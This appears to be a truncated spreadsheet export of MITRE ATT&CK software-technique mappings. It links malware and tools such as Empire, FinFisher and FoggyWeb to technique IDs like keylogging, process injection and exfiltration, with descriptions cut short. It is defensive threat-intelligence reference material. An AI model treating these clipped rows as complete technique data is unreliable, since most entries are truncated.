S0363 Empire tool--3433 software uses T1574.007Path Inter attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1574.008Path Intercattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1574.009Path Inter attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1059.001PowerShellattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1552.004Private Keyattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1057 Process Di attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1055 Process Injattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1547.001Registry Ruattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1134.005SID-Historyattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1021.004SSH attack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1053.005Scheduled attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1113 Screen Capattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1518.001Security S attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1547.005Security Suattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1569.002Service Ex attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1547.009Shortcut Mattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1558.002Silver Tickeattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1082 System Inf attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1016 System Netattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1049 System Netattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1033 System Own attack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1070.006Timestompattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1125 Video Captattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1071.001Web Protocattack-pat technique [Empire](h
S0363 Empire tool--3433 software uses T1059.003Windows Cattack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1047 Windows M attack-pat technique [Empire](ht
S0363 Empire tool--3433 software uses T1543.003Windows Se attack-pat technique [Empire](ht
S0634 EnvyScout malware-- software uses T1005 Data from attack-pat technique [EnvyScout
S0634 EnvyScout malware-- software uses T1140 Deobfuscatattack-pat technique [EnvyScout]
S0634 EnvyScout malware-- software uses T1027.013Encrypted/attack-pat technique [EnvyScout
S0634 EnvyScout malware-- software uses T1480 Execution attack-pat technique [EnvyScout
S0634 EnvyScout malware-- software uses T1187 Forced Autattack-pat technique [EnvyScout]
S0634 EnvyScout malware-- software uses T1027.006HTML Smugattack-pat technique [EnvyScout]
S0634 EnvyScout malware-- software uses T1564.001Hidden Fileattack-pat technique [EnvyScout]
S0634 EnvyScout malware-- software uses T1059.007JavaScript attack-pat technique [EnvyScout]
S0634 EnvyScout malware-- software uses T1204.002Malicious Fattack-pat technique [EnvyScout]
S0634 EnvyScout malware-- software uses T1036 Masqueradattack-pat technique [EnvyScout]
S0634 EnvyScout malware-- software uses T1218.011Rundll32 attack-pat technique [EnvyScout]
S0634 EnvyScout malware-- software uses T1566.001Spearphishattack-pat technique [EnvyScout
S0634 EnvyScout malware-- software uses T1082 System Inf attack-pat technique [EnvyScout
S0634 EnvyScout malware-- software uses T1059.003Windows Cattack-pat technique [EnvyScout
S0091 Epic malware-- software uses T1560 Archive Coattack-pat technique [Epic](http
S0091 Epic malware-- software uses T1560.002Archive viaattack-pat technique [Epic](http
S0091 Epic malware-- software uses T1553.002Code Signi attack-pat technique [Turla](htt
S0091 Epic malware-- software uses T1055.011Extra Windattack-pat technique [Epic](http
S0091 Epic malware-- software uses T1070.004File Deleti attack-pat technique [Epic](http
S0091 Epic malware-- software uses T1083 File and Di attack-pat technique [Epic](http
S0091 Epic malware-- software uses T1087.001Local Acco attack-pat technique [Epic](http
S0091 Epic malware-- software uses T1069.001Local Grouattack-pat technique [Epic](http
S0091 Epic malware-- software uses T1027 Obfuscatedattack-pat technique [Epic](http
S0091 Epic malware-- software uses T1057 Process Di attack-pat technique [Epic](http
S0091 Epic malware-- software uses T1012 Query Regiattack-pat technique [Epic](htt
S0091 Epic malware-- software uses T1018 Remote Sysattack-pat technique [Epic](htt
S0091 Epic malware-- software uses T1518.001Security S attack-pat technique [Epic](http
S0091 Epic malware-- software uses T1573.001Symmetric attack-pat technique [Epic](http
S0091 Epic malware-- software uses T1082 System Inf attack-pat technique [Epic](http
S0091 Epic malware-- software uses T1016 System Netattack-pat technique [Epic](htt
S0091 Epic malware-- software uses T1049 System Netattack-pat technique [Epic](htt
S0091 Epic malware-- software uses T1033 System Own attack-pat technique [Epic](http
S0091 Epic malware-- software uses T1007 System Serattack-pat technique [Epic](http
S0091 Epic malware-- software uses T1124 System Timattack-pat technique [Epic](http
S0091 Epic malware-- software uses T1071.001Web Protocattack-pat technique [Epic](http
S0396 EvilBunny malware-- software uses T1203 Exploitatioattack-pat technique [EvilBunny]
S0396 EvilBunny malware-- software uses T1070.004File Deleti attack-pat technique [EvilBunny]
S0396 EvilBunny malware-- software uses T1105 Ingress Tooattack-pat technique [EvilBunny]
S0396 EvilBunny malware-- software uses T1059.011Lua attack-pat technique [EvilBunny]
S0396 EvilBunny malware-- software uses T1106 Native API attack-pat technique [EvilBunny]
S0396 EvilBunny malware-- software uses T1057 Process Di attack-pat technique [EvilBunny
S0396 EvilBunny malware-- software uses T1547.001Registry Ruattack-pat technique [EvilBunny
S0396 EvilBunny malware-- software uses T1053.005Scheduled attack-pat technique [EvilBunny
S0396 EvilBunny malware-- software uses T1518.001Security S attack-pat technique [EvilBunny]
S0396 EvilBunny malware-- software uses T1497.001System Cheattack-pat technique [EvilBunny]
S0396 EvilBunny malware-- software uses T1124 System Timattack-pat technique [EvilBunny]
S0396 EvilBunny malware-- software uses T1497.003Time Basedattack-pat technique [EvilBunny]
S0396 EvilBunny malware-- software uses T1071.001Web Protocattack-pat technique [EvilBunny
S0396 EvilBunny malware-- software uses T1059.003Windows Cattack-pat technique [EvilBunny]
S0396 EvilBunny malware-- software uses T1047 Windows M attack-pat technique [EvilBunny
S0152 EvilGrab malware-- software uses T1123 Audio Captattack-pat technique [EvilGrab](
S0152 EvilGrab malware-- software uses T1056.001Keyloggingattack-pat technique [EvilGrab](
S0152 EvilGrab malware-- software uses T1547.001Registry Ruattack-pat technique [EvilGrab](
S0152 EvilGrab malware-- software uses T1113 Screen Capattack-pat technique [EvilGrab](
S0152 EvilGrab malware-- software uses T1125 Video Captattack-pat technique [EvilGrab](
S0401 Exaramel fomalware-- software uses T1543 Create or attack-pat technique [Exaramel f
S0401 Exaramel fomalware-- software uses T1053.003Cron attack-pat technique [Exaramel f
S0401 Exaramel fomalware-- software uses T1140 Deobfuscatattack-pat technique [Exaramel f
S0401 Exaramel fomalware-- software uses T1027.013Encrypted/attack-pat technique [Exaramel f
S0401 Exaramel fomalware-- software uses T1008 Fallback C attack-pat technique [Exaramel f
S0401 Exaramel fomalware-- software uses T1070.004File Deleti attack-pat technique [Exaramel f
S0401 Exaramel fomalware-- software uses T1105 Ingress Tooattack-pat technique [Exaramel f
S0401 Exaramel fomalware-- software uses T1548.001Setuid and attack-pat technique [Exaramel f
S0401 Exaramel fomalware-- software uses T1033 System Own attack-pat technique [Exaramel
S0401 Exaramel fomalware-- software uses T1543.002Systemd Seattack-pat technique [Exaramel f
S0401 Exaramel fomalware-- software uses T1059.004Unix Shell attack-pat technique [Exaramel
S0401 Exaramel fomalware-- software uses T1071.001Web Protocattack-pat technique [Exaramel
S0343 Exaramel fmalware--0software uses T1560 Archive Coattack-pat technique [Exaramel f
S0343 Exaramel fmalware--0software uses T1027.011Fileless St attack-pat technique [Exaramel f
S0343 Exaramel fmalware--0software uses T1074.001Local Data attack-pat technique [Exaramel f
S0343 Exaramel fmalware--0software uses T1036.004Masquerade attack-pat technique The [Exara
S0343 Exaramel fmalware--0software uses T1112 Modify Regattack-pat technique [Exaramel f
S0343 Exaramel fmalware--0software uses T1059.005Visual Basiattack-pat technique [Exaramel
S0343 Exaramel fmalware--0software uses T1059.003Windows Cattack-pat technique [Exaramel
S0343 Exaramel fmalware--0software uses T1543.003Windows Se attack-pat technique The [Exara
S0361 Expand tool--ca65 software uses T1140 Deobfuscatattack-pat technique [Expand](ht
S0361 Expand tool--ca65 software uses T1570 Lateral Tooattack-pat technique [Expand](ht
S0361 Expand tool--ca65 software uses T1564.004NTFS File Aattack-pat technique [Expand](ht
S0569 Explosive malware--6software uses T1115 Clipboard attack-pat technique [Explosive]
S0569 Explosive malware--6software uses T1025 Data from attack-pat technique [Explosive]
S0569 Explosive malware--6software uses T1564.001Hidden Fileattack-pat technique [Explosive]
S0569 Explosive malware--6software uses T1105 Ingress Tooattack-pat technique [Explosive]
S0569 Explosive malware--6software uses T1056.001Keyloggingattack-pat technique [Explosive]
S0569 Explosive malware--6software uses T1112 Modify Regattack-pat technique [Explosive]
S0569 Explosive malware--6software uses T1106 Native API attack-pat technique [Explosive]
S0569 Explosive malware--6software uses T1573.001Symmetric attack-pat technique [Explosive
S0569 Explosive malware--6software uses T1082 System Inf attack-pat technique [Explosive]
S0569 Explosive malware--6software uses T1016 System Netattack-pat technique [Explosive
S0569 Explosive malware--6software uses T1033 System Own attack-pat technique [Explosive]
S0569 Explosive malware--6software uses T1071.001Web Protocattack-pat technique [Explosive
S0181 FALLCHILL malware-- software uses T1070.004File Deleti attack-pat technique [FALLCHILL]
S0181 FALLCHILL malware-- software uses T1083 File and Di attack-pat technique [FALLCHILL]
S0181 FALLCHILL malware-- software uses T1001.003Protocol o attack-pat technique [FALLCHILL]
S0181 FALLCHILL malware-- software uses T1573.001Symmetric attack-pat technique [FALLCHILL]
S0181 FALLCHILL malware-- software uses T1082 System Inf attack-pat technique [FALLCHILL]
S0181 FALLCHILL malware-- software uses T1016 System Netattack-pat technique [FALLCHILL]
S0181 FALLCHILL malware-- software uses T1070.006Timestompattack-pat technique [FALLCHILL]
S0181 FALLCHILL malware-- software uses T1543.003Windows Se attack-pat technique [FALLCHILL]
S0267 FELIXROOTmalware--csoftware uses T1560 Archive Coattack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1027.013Encrypted/attack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1070.004File Deleti attack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1105 Ingress Tooattack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1112 Modify Regattack-pat technique [FELIXROOT
S0267 FELIXROOTmalware--csoftware uses T1057 Process Di attack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1012 Query Regiattack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1547.001Registry Ruattack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1218.011Rundll32 attack-pat technique [FELIXROOT
S0267 FELIXROOTmalware--csoftware uses T1518.001Security S attack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1547.009Shortcut Mattack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1082 System Inf attack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1016 System Netattack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1033 System Own attack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1124 System Timattack-pat technique [FELIXROOT
S0267 FELIXROOTmalware--csoftware uses T1071.001Web Protocattack-pat technique [FELIXROOT
S0267 FELIXROOTmalware--csoftware uses T1059.003Windows Cattack-pat technique [FELIXROOT]
S0267 FELIXROOTmalware--csoftware uses T1047 Windows M attack-pat technique [FELIXROOT
S0618 FIVEHANDSmalware-- software uses T1059 Command attack-pat
an technique [FIVEHANDS]
S0618 FIVEHANDSmalware-- software uses T1486 Data Encryattack-pat technique [FIVEHANDS
S0618 FIVEHANDSmalware-- software uses T1140 Deobfuscatattack-pat technique [FIVEHANDS]
S0618 FIVEHANDSmalware-- software uses T1027.013Encrypted/attack-pat technique The [FIVEH
S0618 FIVEHANDSmalware-- software uses T1083 File and Di attack-pat technique [FIVEHANDS]
S0618 FIVEHANDSmalware-- software uses T1490 Inhibit Sy attack-pat technique [FIVEHANDS
S0618 FIVEHANDSmalware-- software uses T1135 Network Shattack-pat technique [FIVEHANDS
S0618 FIVEHANDSmalware-- software uses T1047 Windows M attack-pat technique [FIVEHANDS
S0036 FLASHFLO malware--4software uses T1560.003Archive vi attack-pat technique [FLASHFLOOD
S0036 FLASHFLO malware--4software uses T1005 Data from attack-pat technique [FLASHFLOOD
S0036 FLASHFLO malware--4software uses T1025 Data from attack-pat technique [FLASHFLOOD
S0036 FLASHFLO malware--4software uses T1083 File and Di attack-pat technique [FLASHFLOOD
S0036 FLASHFLO malware--4software uses T1074.001Local Data attack-pat technique [FLASHFLOO
S0036 FLASHFLO malware--4software uses T1547.001Registry Ruattack-pat technique [FLASHFLOOD
S0173 FLIPSIDE malware-- software uses T1572 Protocol T attack-pat technique [FLIPSIDE](
S1120 FRAMESTI malware-- software uses T1554 Compromise attack-pat technique [FRAMESTIN
S1120 FRAMESTI malware-- software uses T1001 Data Obfusattack-pat technique [FRAMESTIN
S1120 FRAMESTI malware-- software uses T1140 Deobfuscatattack-pat technique [FRAMESTIN
S1120 FRAMESTI malware-- software uses T1001.003Protocol o attack-pat technique [FRAMESTIN
S1120 FRAMESTI malware-- software uses T1059.006Python attack-pat technique [FRAMESTIN
S1120 FRAMESTI malware-- software uses T1071.001Web Protocattack-pat technique [FRAMESTIN
S1120 FRAMESTI malware-- software uses T1505.003Web Shell attack-pat technique [FRAMESTIN
S1144 FRP tool--36d software uses T1573.002Asymmetricattack-pat technique [FRP](https
S1144 FRP tool--36d software uses T1059.007JavaScript attack-pat technique [FRP](https
S1144 FRP tool--36d software uses T1090.003Multi-hop attack-pat technique The [FRP](h
S1144 FRP tool--36d software uses T1046 Network Seattack-pat technique As part of
S1144 FRP tool--36d software uses T1095 Non-Applicattack-pat technique [FRP](http
S1144 FRP tool--36d software uses T1572 Protocol T attack-pat technique [FRP](http
S1144 FRP tool--36d software uses T1090 Proxy attack-pat technique [FRP](https
S1144 FRP tool--36d software uses T1573.001Symmetric attack-pat technique [FRP](https
S1144 FRP tool--36d software uses T1049 System Netattack-pat technique [FRP](https
S1144 FRP tool--36d software uses T1071.001Web Protocattack-pat technique [FRP](https
S0628 FYAnti malware-- software uses T1140 Deobfuscatattack-pat technique [FYAnti](ht
S0628 FYAnti malware-- software uses T1083 File and Di attack-pat technique [FYAnti](ht
S0628 FYAnti malware-- software uses T1105 Ingress Tooattack-pat technique [FYAnti](ht
S0628 FYAnti malware-- software uses T1027.002Software Pattack-pat technique [FYAnti](ht
S0076 FakeM malware-- software uses T1056.001Keyloggingattack-pat technique [FakeM](htt
S0076 FakeM malware-- software uses T1095 Non-Applicattack-pat technique Some varian
S0076 FakeM malware-- software uses T1001.003Protocol o attack-pat technique [FakeM](htt
S0076 FakeM malware-- software uses T1573.001Symmetric attack-pat technique The origina
S0512 FatDuke malware--5software uses T1027.001Binary Padattack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1005 Data from attack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1140 Deobfuscatattack-pat technique [FatDuke](
S0512 FatDuke malware--5software uses T1008 Fallback C attack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1070.004File Deleti attack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1083 File and Di attack-pat technique [FatDuke](
S0512 FatDuke malware--5software uses T1090.001Internal Prattack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1036 Masqueradattack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1106 Native API attack-pat technique [FatDuke](
S0512 FatDuke malware--5software uses T1027 Obfuscatedattack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1059.001PowerShellattack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1057 Process Di attack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1012 Query Regiattack-pat technique [FatDuke](
S0512 FatDuke malware--5software uses T1547.001Registry Ruattack-pat technique [FatDuke](
S0512 FatDuke malware--5software uses T1218.011Rundll32 attack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1027.002Software Pattack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1573.001Symmetric attack-pat technique [FatDuke](
S0512 FatDuke malware--5software uses T1082 System Inf attack-pat technique [FatDuke](
S0512 FatDuke malware--5software uses T1016 System Netattack-pat technique [FatDuke](
S0512 FatDuke malware--5software uses T1497.003Time Basedattack-pat technique [FatDuke](h
S0512 FatDuke malware--5software uses T1071.001Web Protocattack-pat technique [FatDuke](h
S0171 Felismus malware-- software uses T1105 Ingress Tooattack-pat technique [Felismus](
S0171 Felismus malware-- software uses T1036.005Match Legiattack-pat technique [Felismus]
S0171 Felismus malware-- software uses T1518.001Security S attack-pat technique [Felismus](
S0171 Felismus malware-- software uses T1132.001Standard Eattack-pat technique Some [Felis
S0171 Felismus malware-- software uses T1573.001Symmetric attack-pat technique Some [Felis
S0171 Felismus malware-- software uses T1082 System Inf attack-pat technique [Felismus](
S0171 Felismus malware-- software uses T1016 System Netattack-pat technique [Felismus](
S0171 Felismus malware-- software uses T1033 System Own attack-pat technique [Felismus](
S0171 Felismus malware-- software uses T1071.001Web Protocattack-pat technique [Felismus](
S0171 Felismus malware-- software uses T1059.003Windows Cattack-pat technique [Felismus](
S0679 Ferocious malware--7software uses T1546.015Componentattack-pat technique [Ferocious
S0679 Ferocious malware--7software uses T1070.004File Deleti attack-pat technique [Ferocious
S0679 Ferocious malware--7software uses T1112 Modify Regattack-pat technique [Ferocious]
S0679 Ferocious malware--7software uses T1120 Peripheral attack-pat technique [Ferocious
S0679 Ferocious malware--7software uses T1059.001PowerShellattack-pat technique [Ferocious]
S0679 Ferocious malware--7software uses T1518.001Security S attack-pat technique [Ferocious]
S0679 Ferocious malware--7software uses T1497.001System Cheattack-pat technique [Ferocious]
S0679 Ferocious malware--7software uses T1082 System Inf attack-pat technique [Ferocious
S0679 Ferocious malware--7software uses T1059.005Visual Basiattack-pat technique [Ferocious]
S0120 Fgdump tool--4f45 software uses T1003.002Security A attack-pat technique [Fgdump](h
S0182 FinFisher malware-- software uses T1027.001Binary Padattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1542.003Bootkit attack-pat technique Some [FinFi
S0182 FinFisher malware-- software uses T1548.002Bypass Useattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1070.001Clear Windattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1056.004Credential attack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1574.001DLL Searchattack-pat technique A [FinFishe
S0182 FinFisher malware-- software uses T1574.002DLL Side-L attack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1140 Deobfuscatattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1055.001Dynamic-linattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1083 File and Di attack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1574.013KernelCall attack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1036.005Match Legiattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1027 Obfuscatedattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1057 Process Di attack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1012 Query Regiattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1547.001Registry Ruattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1113 Screen Capattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1518.001Security S attack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1027.002Software Pattack-pat technique A [FinFishe
S0182 FinFisher malware-- software uses T1497.001System Cheattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1082 System Inf attack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1134.001Token Impeattack-pat technique [FinFisher]
S0182 FinFisher malware-- software uses T1543.003Windows Se attack-pat technique [FinFisher]
S0355 Final1stspymalware--asoftware uses T1140 Deobfuscatattack-pat technique [Final1stsp
S0355 Final1stspymalware--asoftware uses T1027 Obfuscatedattack-pat technique [Final1stsp
S0355 Final1stspymalware--asoftware uses T1057 Process Di attack-pat technique [Final1stsp
S0355 Final1stspymalware--asoftware uses T1547.001Registry Ruattack-pat technique [Final1stsp
S0355 Final1stspymalware--asoftware uses T1082 System Inf attack-pat technique [Final1stsp
S0355 Final1stspymalware--asoftware uses T1071.001Web Protocattack-pat technique [Final1stsp
S0696 Flagpro malware-- software uses T1010 Applicatio attack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1005 Data from attack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1041 Exfiltratio attack-pat technique [Flagpro](h
S0696 Flagpro malware-- software uses T1070 Indicator attack-pat technique [Flagpro](h
S0696 Flagpro malware-- software uses T1105 Ingress Tooattack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1069.001Local Grouattack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1204.002Malicious Fattack-pat technique [Flagpro](h
S0696 Flagpro malware-- software uses T1036 Masqueradattack-pat technique [Flagpro](h
S0696 Flagpro malware-- software uses T1106 Native API attack-pat technique [Flagpro](h
S0696 Flagpro malware-- software uses T1135 Network Shattack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1027 Obfuscatedattack-pat technique [Flagpro](h
S0696 Flagpro malware-- software uses T1057 Process Di attack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1547.001Registry Ruattack-pat technique [Flagpro](h
S0696 Flagpro malware-- software uses T1018 Remote Sysattack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1029 Scheduled attack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1566.001Spearphishattack-pat technique [Flagpro](h
S0696 Flagpro malware-- software uses T1132.001Standard Eattack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1614.001System Lanattack-pat technique [Flagpro](h
S0696 Flagpro malware-- software uses T1016 System Netattack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1049 System Netattack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1033 System Own attack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1059.005Visual Basiattack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1071.001Web Protocattack-pat technique [Flagpro](
S0696 Flagpro malware-- software uses T1059.003Windows Cattack-pat technique [Flagpro](
S0143 Flame malware--fsoftware uses T1123 Audio Captattack-pat technique [Flame](htt
S0143 Flame malware--fsoftware uses T1547.002Authenticaattack-pat technique [Flame](htt
S0143 Flame malware--fsoftware uses T1011.001Exfiltratio attack-pat technique [Flame](htt
S0143 Flame malware--fsoftware uses T1210 Exploitatioattack-pat technique [Flame](htt
S0143 Flame malware--fsoftware uses T1136.001Local Acco attack-pat technique [Flame](htt
S0143 Flame malware--fsoftware uses T1036.010Masqueradattack-pat technique [Flame](htt
S0143 Flame malware--fsoftware uses T1091 Replicatio attack-pat technique [Flame](htt
S0143 Flame malware--fsoftware uses T1218.011Rundll32 attack-pat technique Rundll32.ex
S0143 Flame malware--fsoftware uses T1113 Screen Capattack-pat technique [Flame](htt
S0143 Flame malware--fsoftware uses T1518.001Security S attack-pat technique [Flame](htt
S0381 FlawedAmmalware--4software uses T1115 Clipboard attack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1001 Data Obfusattack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1005 Data from attack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1041 Exfiltratio attack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1070.004File Deleti attack-pat technique [FlawedAmmy
S0381 FlawedAmmalware--4software uses T1105 Ingress Tooattack-pat technique [FlawedAmmy
S0381 FlawedAmmalware--4software uses T1056 Input Capt attack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1056.001Keyloggingattack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1069.001Local Grouattack-pat technique [FlawedAmmy
S0381 FlawedAmmalware--4software uses T1218.007Msiexec attack-pat technique [FlawedAmmy
S0381 FlawedAmmalware--4software uses T1120 Peripheral attack-pat technique [FlawedAmmy
S0381 FlawedAmmalware--4software uses T1059.001PowerShellattack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1547.001Registry Ruattack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1218.011Rundll32 attack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1113 Screen Capattack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1518.001Security S attack-pat technique [FlawedAmmy
S0381 FlawedAmmalware--4software uses T1573.001Symmetric attack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1082 System Inf attack-pat technique [FlawedAmmy
S0381 FlawedAmmalware--4software uses T1033 System Own attack-pat technique [FlawedAmmy
S0381 FlawedAmmalware--4software uses T1071.001Web Protocattack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1059.003Windows Cattack-pat technique [FlawedAmm
S0381 FlawedAmmalware--4software uses T1047 Windows M attack-pat technique [FlawedAmm
S0383 FlawedGramalware-- software uses T1027.013Encrypted/attack-pat technique [FlawedGrac
S0661 FoggyWebmalware--7software uses T1560.003Archive vi attack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1560.002Archive viaattack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1027.004Compile Aftattack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1574.001DLL Searchattack-pat technique [FoggyWeb](
S0661 FoggyWebmalware--7software uses T1005 Data from attack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1140 Deobfuscatattack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1027.013Encrypted/attack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1041 Exfiltratio attack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1083 File and Di attack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1105 Ingress Tooattack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1036 Masqueradattack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1036.005Match Legiattack-pat technique [FoggyWeb](
S0661 FoggyWebmalware--7software uses T1106 Native API attack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1040 Network Snattack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1552.004Private Keyattack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1057 Process Di attack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1620 Reflective attack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1129 Shared Moattack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1573.001Symmetric attack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1550 Use Altern attack-pat technique [FoggyWeb]
S0661 FoggyWebmalware--7software uses T1071.001Web Protocattack-pat technique [FoggyWeb]
S0193 Forfiles tool--90ec software uses T1005 Data from attack-pat technique [Forfiles](
S0193 Forfiles tool--90ec software uses T1083 File and Di attack-pat technique [Forfiles](
S0193 Forfiles tool--90ec software uses T1202 Indirect C attack-pat technique [Forfiles](
S0503 Frameworkmalware-- software uses T1560.003Archive vi attack-pat technique [Framework
S0503 Frameworkmalware-- software uses T1005 Data from attack-pat technique [Framework
S0503 Frameworkmalware-- software uses T1048 Exfiltratio attack-pat technique [Framework
S0503 Frameworkmalware-- software uses T1074.001Local Data attack-pat technique [FrameworkP
S0503 Frameworkmalware-- software uses T1057 Process Di attack-pat technique [Framework
S0277 FruitFly malware-- software uses T1027.010Command aOttack-pat technique [FruitFly](
S0277 FruitFly malware-- software uses T1070.004File Deleti attack-pat technique [FruitFly](
S0277 FruitFly malware-- software uses T1083 File and Di attack-pat technique [FruitFly](
S0277 FruitFly malware-- software uses T1564.001Hidden Fileattack-pat technique [FruitFly](
S0277 FruitFly malware-- software uses T1543.001Launch Ageattack-pat technique [FruitFly](
S0277 FruitFly malware-- software uses T1057 Process Di attack-pat technique [FruitFly](
S0277 FruitFly malware-- software uses T1113 Screen Capattack-pat technique [FruitFly](
S1044 FunnyDre malware-- software uses T1010 Applicatio attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1560.003Archive vi attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1560.002Archive viaattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1119 Automatedattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1559.001Componentattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1001 Data Obfusattack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1005 Data from attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1025 Data from attack-pat technique The [Funny
S1044 FunnyDre malware-- software uses T1055.001Dynamic-linattack-pat technique The [Funny
[FunnyDream](https://attack
S1044 FunnyDre malware-- software uses T1027.013Encrypted/attack-pat technique `xyz0123456789ABCDEFGHIJ
S1044 FunnyDre malware-- software uses T1041 Exfiltratio attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1070.004File Deleti attack-pat technique [FunnyDrea
S1044 FunnyDre malware-- software uses T1083 File and Di attack-pat technique [FunnyDream
